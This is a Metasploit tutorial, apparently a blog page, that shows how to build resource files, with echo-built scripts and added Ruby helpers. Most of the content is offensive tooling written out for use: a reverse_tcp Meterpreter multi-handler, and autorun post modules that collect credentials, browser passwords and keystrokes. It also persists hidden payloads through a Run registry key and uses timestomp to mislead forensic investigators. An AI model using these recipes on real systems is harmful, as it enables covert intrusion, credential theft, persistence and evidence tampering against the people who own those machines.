-:[ metasploit - resource files ]:-

2014-12-16
2023-10-30

    pedro ubuntu - 2014-12-16


    .::[ Metasploit - resource files ]::


                   "Working With Resource Files"
    

    Resource files can greatly speed up testing and development and let you automate many tasks. Besides loading a resource file from within msfconsole with the 'resource' command, you can pass one at startup with the '-r' flag. The simple example below creates a resource file that displays the Metasploit version number.

      touch version.rc
      echo 'version' >> version.rc
      run: msfconsole -r version.rc
      or:  msfconsole -r /root/version.rc
      or:  msf> resource /root/version.rc
    






               "How To load your working dir at msf start?"

    This resource file loads a third-party module tree from the given path, so you can point Metasploit at your own 0-day exploits, encoders and payloads. If you are developing exploit, auxiliary or post modules in Ruby, this is the way to load your working directory into the framework's module tree at startup...

      touch startconf.rc
      echo 'loadpath /home/secret/0Day' >> startconf.rc
      run: msfconsole -r startconf.rc
    






              "Build shell_listenner.rc (multi-handler)"

    Let's create a short script that starts the multi-handler for us. Here we use exploit/multi/handler to receive our payload: we specify that the payload is a Meterpreter reverse_tcp payload, set the payload option, set the local host and port options, and make sure the multi-handler does not exit once it receives a session, since we might need to re-establish one after an error, or might be testing different versions of Windows from different target hosts.

      touch shell_listenner.rc
      echo 'use exploit/multi/handler' >> shell_listenner.rc
      echo 'set PAYLOAD windows/meterpreter/reverse_tcp' >> shell_listenner.rc
      echo 'set LPORT 666' >> shell_listenner.rc
      echo 'set LHOST 192.168.1.68' >> shell_listenner.rc
      echo 'set ExitOnSession false' >> shell_listenner.rc
      echo 'exploit -j -z' >> shell_listenner.rc
    
      run: msfconsole -r shell_listenner.rc
      or:  msfconsole -r /root/shell_listenner.rc
      or:  msf > resource shell_listenner.rc
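    As an added example (not part of the original post and not Metasploit project code), the Ruby script below generates the same multi-handler resource file but checks the values before writing them: LHOST must parse as an IP address, LPORT must lie in 1..65535, and a port below 1024 (such as the 666 used above) is flagged because msfconsole must run as root to bind it. The function names build_handler_rc, handler_warnings and write_rc are my own.

```ruby
require 'ipaddr'
require 'tmpdir'

# Build the lines of a multi/handler resource file, validating the inputs
# before anything is written. Returns an Array of msfconsole commands.
def build_handler_rc(payload:, lhost:, lport:, exit_on_session: false)
  # IPAddr raises IPAddr::InvalidAddressError for anything that is not an address.
  IPAddr.new(lhost)
  raise ArgumentError, "LPORT #{lport} outside 1..65535" unless (1..65_535).cover?(lport)
  # Payload paths look like os/stage/stager, e.g. windows/meterpreter/reverse_tcp.
  raise ArgumentError, "unexpected payload path: #{payload}" unless payload.match?(%r{\A[a-z0-9_]+(/[a-z0-9_]+)+\z})

  [
    'use exploit/multi/handler',
    "set PAYLOAD #{payload}",
    "set LHOST #{lhost}",
    "set LPORT #{lport}",
    "set ExitOnSession #{exit_on_session}",
    # -j runs the handler as a background job and -z does not interact with new
    # sessions; with ExitOnSession false the handler keeps listening after the first one.
    'exploit -j -z'
  ]
end

# Non-fatal things worth knowing before starting the listener.
def handler_warnings(lhost:, lport:)
  warnings = []
  warnings << "LPORT #{lport} is below 1024; msfconsole must run as root to bind it" if lport < 1024
  warnings << "LHOST #{lhost} is a loopback address; remote hosts cannot reach it" if IPAddr.new(lhost).loopback?
  warnings
end

# Write the commands to a .rc file, one per line, and return the path.
def write_rc(path, lines)
  File.write(path, lines.join("\n") + "\n")
  path
end

if __FILE__ == $PROGRAM_NAME
  lines = build_handler_rc(payload: 'windows/meterpreter/reverse_tcp',
                           lhost: '192.168.1.68', lport: 666)
  handler_warnings(lhost: '192.168.1.68', lport: 666).each { |w| warn "warning: #{w}" }
  # Written to the temp dir here; then: msfconsole -r <path>
  puts write_rc(File.join(Dir.tmpdir, 'shell_listenner.rc'), lines)
end
```

    Run it with ruby; the resulting file is equivalent to the one the echo lines above produce, and a typo in LHOST fails before msfconsole is ever started.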
    






         "Automation is the name of the Pentest game (hd moore)"

    Metasploit AutoRunScript is great when you need a module to run automatically after exploitation. Getting a single script to run once meterpreter starts is easy, but what if you want multiple post scripts to run? From the msfconsole prompt run:

      msf > set AutoRunScript multi_console_command -rc /root/autoruncommands.rc
    


                       "Build autoruncommands.rc"
    
      touch autoruncommands.rc
      echo 'run post/windows/manage/migrate' >> autoruncommands.rc
      echo 'run post/windows/gather/checkvm' >> autoruncommands.rc
      echo 'run post/windows/gather/credential_collector' >> autoruncommands.rc
      echo 'run post/multi/gather/firefox_creds' >> autoruncommands.rc
      echo 'run post/windows/capture/keylog_recorder' >> autoruncommands.rc
    


    Now save autoruncommands.rc in the root folder (/root) and run it like this:

      msf > run multi_console_command -rc /root/autoruncommands.rc
    


    Or run it on the multi-handler using AutoRunScript= like this:

       msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/autoruncommands.rc' E
    


    This way we only need to configure the handler's AutoRunScript= to point at our resource file; every time the handler opens a session, AutoRunScript= runs all the post-exploitation modules written in the 'autoruncommands.rc' file.






          "GO FURTHER IN POST-EXPLOITATION 'POST-AUTO.RC'"

    The following example shows how to persist a payload at post-exploitation time. Let's say we have already built the powershell.bat payload and a hidden.vbs script that executes powershell.bat in a hidden CMD window. So how do we persist powershell.bat using resource files?

    We use the listener's 'AutoRunScript' flag to launch the post-auto.rc file, which contains instructions to migrate the current session into the privileged wininit.exe process, upload the two files and insert a registry value in the target's registry. This way, when the listener (multi-handler) receives the remote connection, it launches 'post-auto.rc' against the meterpreter session just opened (ID 1)...


      "Post-Auto-rc"
      touch Post-Auto.rc
      echo 'sysinfo' >> Post-Auto.rc
      echo 'run migrate -n wininit.exe' >> Post-Auto.rc
      echo 'upload /var/www/powershell.bat C:\\Windows\\System32\\powershell.bat' >> Post-Auto.rc
      echo 'upload /var/www/hidden.vbs C:\\Windows\\System32\\hidden.vbs' >> Post-Auto.rc
      echo "reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v persistence -d 'C:\windows\system32\hidden.vbs'" >> Post-Auto.rc
      echo 'reg enumkey -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' >> Post-Auto.rc
    
    
      "Run msf Listenner"
      msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/Post-Auto.rc' E
    












                "PERSISTENCE CLEANUP RESOURCE FILE"

    Some Metasploit developers use resource files to undo the configuration changes made at post-exploitation time. 'darkoperator' developed 'persistence.rb' to upload a meterpreter reverse payload and a VBScript file containing instructions to add a startup registry key pointing to the path where the payload is stored on the target system; the module also writes out a resource file to revert the changes it made.

    "persistence.rb script by darkoperator (cleanup function)"



    In this next example we build a resource file (clean_post-auto.rc) that reverts the changes made on the target host by 'post-auto.rc' in the previous example, "persist a payload at post-exploitation time".

      "clean_post-auto.rc"
      touch clean_post-auto.rc
      echo 'run migrate -n wininit.exe' >> clean_post-auto.rc
      echo 'del C:\Windows\System32\powershell.bat' >> clean_post-auto.rc
      echo 'del C:\Windows\System32\hidden.vbs' >> clean_post-auto.rc
      echo 'reg deleteval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v persistence' >> clean_post-auto.rc
      (reg deleteval removes only the 'persistence' value; reg deletekey would delete the whole Run key)
    
      "Run msf Listenner"
      msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/clean_post-auto.rc' E
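    As an added example (not part of the original post and not persistence.rb itself), the Ruby script below does for a resource file what persistence.rb does for its own changes: it reads a post-exploitation .rc such as Post-Auto.rc and derives the cleanup .rc automatically, turning every upload into a del of the remote path and every reg setval into a reg deleteval of the same key and value, undone in reverse order. The sample POST_AUTO_RC is a constructed copy of the file built earlier on this page; the function names cleanup_commands and write_cleanup_rc are my own.

```ruby
# Constructed copy of the Post-Auto.rc built earlier on this page (the echo
# lines with single quotes leave the doubled backslashes in the file).
POST_AUTO_RC = <<~'RC'
  sysinfo
  run migrate -n wininit.exe
  upload /var/www/powershell.bat C:\\Windows\\System32\\powershell.bat
  upload /var/www/hidden.vbs C:\\Windows\\System32\\hidden.vbs
  reg setval -k HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -v persistence -d 'C:\windows\system32\hidden.vbs'
  reg enumkey -k HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RC

# Derive the cleanup commands for one resource file. Every upload becomes a
# del of the remote path and every reg setval becomes a reg deleteval of the
# same key/value; the changes are undone in reverse order. Commands that change
# nothing on the target (sysinfo, reg enumkey) produce no cleanup step.
def cleanup_commands(rc_text)
  migrate = nil
  undo = []
  rc_text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?('#')
    case line
    when /\Arun migrate\b/
      migrate = line                                  # stay in the same process context
    when /\Aupload\s+\S+\s+(\S+)\z/
      undo << "del #{$1}"
    when /\Areg setval -k (\S+) -v (\S+)/
      # deleteval removes one value; deletekey would drop the whole Run key.
      undo << "reg deleteval -k #{$1} -v #{$2}"
    end
  end
  ([migrate] + undo.reverse).compact
end

# Read a post-exploitation .rc and write its cleanup .rc; returns the lines written.
def write_cleanup_rc(post_auto_path, cleanup_path)
  lines = cleanup_commands(File.read(post_auto_path))
  File.write(cleanup_path, "# generated from #{post_auto_path}\n" + lines.join("\n") + "\n")
  lines
end

if __FILE__ == $PROGRAM_NAME
  puts cleanup_commands(POST_AUTO_RC)
end
```

    The generated file is then run against the session the same way as clean_post-auto.rc above. Generating the cleanup from the same file that made the changes means nothing uploaded or written to the registry is forgotten when the engagement ends.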
    








                 "PORT NMAP.XML LOGFILE TO MSF DB"

    In this next example we use Nmap to scan our local LAN for live hosts and write the log in [.xml] format; then we build a resource file [msfdb.rc] to import the [.xml] log into the Metasploit database, so the hosts found can be accessed from Metasploit...



      "scanning using nmap"
      nmap -sV -Pn -p 1-1000 -O --open -oX /root/Random-Hosts.xml 192.168.1.0/24
    
      "build resource file"
      touch /root/msfdb.rc
      echo 'db_import /root/Random-Hosts.xml' >> /root/msfdb.rc
      echo 'hosts' >> /root/msfdb.rc
      echo 'services' >> /root/msfdb.rc
    
      "start metasploit database"
      service metasploit start > /dev/null 2>&1
      msfconsole -r /root/msfdb.rc
    
      "clean database"
      msf > hosts -d
      msf > services -d
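    As an added example (not part of the original post and not Metasploit's own importer), the Ruby script below parses the -oX output that db_import reads and lists what the hosts and services commands would then show: only hosts whose status is up, and only ports whose state is open. SAMPLE_NMAP_XML is a constructed document in the shape nmap writes, not a real scan; the function names parse_nmap_xml, attr_of and render are my own.

```ruby
require 'rexml/document'

# Constructed sample in the shape of nmap's -oX output (not a real scan).
SAMPLE_NMAP_XML = <<~XML
  <?xml version="1.0"?>
  <nmaprun scanner="nmap" args="nmap -sV -Pn -p 1-1000 -O --open -oX Random-Hosts.xml 192.168.1.0/24">
    <host>
      <status state="up" reason="arp-response"/>
      <address addr="192.168.1.10" addrtype="ipv4"/>
      <address addr="AA:BB:CC:DD:EE:01" addrtype="mac"/>
      <hostnames><hostname name="files.lan" type="PTR"/></hostnames>
      <ports>
        <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH" version="8.9"/></port>
        <port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/><service name="microsoft-ds"/></port>
      </ports>
      <os><osmatch name="Linux 5.X" accuracy="95"/></os>
    </host>
    <host>
      <status state="up" reason="arp-response"/>
      <address addr="192.168.1.20" addrtype="ipv4"/>
      <ports>
        <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http" product="nginx"/></port>
        <port protocol="tcp" portid="8080"><state state="filtered" reason="no-response"/><service name="http-proxy"/></port>
      </ports>
    </host>
    <host>
      <status state="down" reason="no-response"/>
      <address addr="192.168.1.30" addrtype="ipv4"/>
    </host>
  </nmaprun>
XML

# Attribute lookup that tolerates a missing element.
def attr_of(element, name)
  element && element.attributes[name]
end

# Return the live hosts with their open services, roughly what `hosts` and
# `services` list after db_import.
def parse_nmap_xml(xml)
  doc = REXML::Document.new(xml)
  hosts = []
  doc.elements.each('nmaprun/host') do |h|
    next unless attr_of(h.elements['status'], 'state') == 'up'
    services = []
    h.elements.each('ports/port') do |p|
      next unless attr_of(p.elements['state'], 'state') == 'open'
      svc = p.elements['service']
      services << {
        port:  p.attributes['portid'].to_i,
        proto: p.attributes['protocol'],
        name:  attr_of(svc, 'name'),
        info:  [attr_of(svc, 'product'), attr_of(svc, 'version')].compact.join(' ')
      }
    end
    hosts << {
      address:  attr_of(h.elements["address[@addrtype='ipv4']"], 'addr'),
      mac:      attr_of(h.elements["address[@addrtype='mac']"], 'addr'),
      name:     attr_of(h.elements['hostnames/hostname'], 'name'),
      os:       attr_of(h.elements['os/osmatch'], 'name'),
      services: services
    }
  end
  hosts
end

# Plain-text rendering: one line per host, then one line per open service.
def render(hosts)
  out = hosts.map { |h| format('%-15s %-12s %s', h[:address], h[:name] || '', h[:os] || '') }
  hosts.each do |h|
    h[:services].each do |s|
      out << format('%-15s %5d/%s %-14s %s', h[:address], s[:port], s[:proto], s[:name], s[:info])
    end
  end
  out.join("\n")
end

if __FILE__ == $PROGRAM_NAME
  xml = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_NMAP_XML   # e.g. /root/Random-Hosts.xml
  puts render(parse_nmap_xml(xml))
end
```

    Pass the path of a real -oX file as the first argument to check what an import will bring in before running db_import; the host that is down and the filtered port are dropped, which is the same filtering the database view applies.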
    








          "MANIPULATE TIMESTOMP (modified|accessed|created)"

    Sometimes in post-exploitation we need to cover our tracks on the target system to mislead forensics; one way to do that is to manipulate the MACE values (timestomp) of a file or, recursively, of a directory.


    In the following example we upload a file to the target host and change its MACE values to another date/time, so the file appears to have been created/accessed in 2013; the "-r" flag changes the MACE of all files inside the temp folder. Note that timestomp expects dates as MM/DD/YYYY HH24:MI:SS.

      "build resource file"
      touch timereset.rc
      echo 'run migrate -n wininit.exe' >> timereset.rc
      echo 'upload /var/www/powershell.bat %temp%\\powershell.bat' >> timereset.rc
      echo 'timestomp %temp% -r -z "01/21/2013 23:26:35"' >> timereset.rc
    
      "run resource file"
      meterpreter > resource /root/timereset.rc
    








             "Post Module Reference - Metasploit Unleashed"
    

    http://www.offensive-security.com/metasploit-unleashed/Post_Module_Reference

                 "How to exploit using resource script?"
    

    http://solutionsatexperts.com/exploit-using-resource-script-metasploit/
    http://www.securityartwork.es/2012/05/21/uso-eficiente-de-metasploit-resource-scripts/






                 "resource files video tutorial"
    (video not available)

            "resource files video tutorial (netool toolkit)"
    (video not available)

                        "scan WAN network"
                [port nmap.xml logfile to msf db]
    (video not available)



     

    Last edit: pedro ubuntu 2015-02-23
